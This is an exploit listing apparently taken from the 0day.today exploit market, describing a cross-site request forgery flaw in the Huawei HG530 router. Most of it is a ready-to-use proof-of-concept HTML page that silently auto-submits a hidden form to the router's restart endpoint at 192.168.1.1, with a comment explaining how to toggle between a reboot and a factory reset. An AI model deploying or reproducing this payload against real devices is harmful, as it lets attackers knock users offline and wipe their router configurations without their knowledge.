[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Huawei HG530 Cross Site Request Forgery Vulnerability

Author
Raki Ben Hamouda
Risk
[
Security Risk Low
]
0day-ID
0day-ID-32957
Category
web applications
Date add
07-07-2019
Platform
hardware
Multiple CSRF reboot and restore Vulnerability

===========================

The Huawei HG530 suffers from multiple CSRF vulnerability allows local
attackers to reboot the device or to restore to factory Configuration.

==================

The vulnerability is located in form POST data parameter in
'Restart_factory' via path '/Forms/bottom_restart_1'

====================

Security issue PoC :

<html>

<FORM METHOD="POST" ACTION="http://192.168.1.1/Forms/bottom_restart_1"
id='test' >

<input type="hidden" name="defaltRomFlag" value="0">

<input type="hidden" name="defaultIpFactory" value="192.168.1.1">



<INPUT TYPE="hidden" NAME="Restart_factory" VALUE="1">





</form>

<script>

document.getElementById('test').submit();

</script>

</html>

//Change Value of 'Restart_factory' to 1 (to restore) or 0 to reboot

#  0day.today [2024-12-25]  #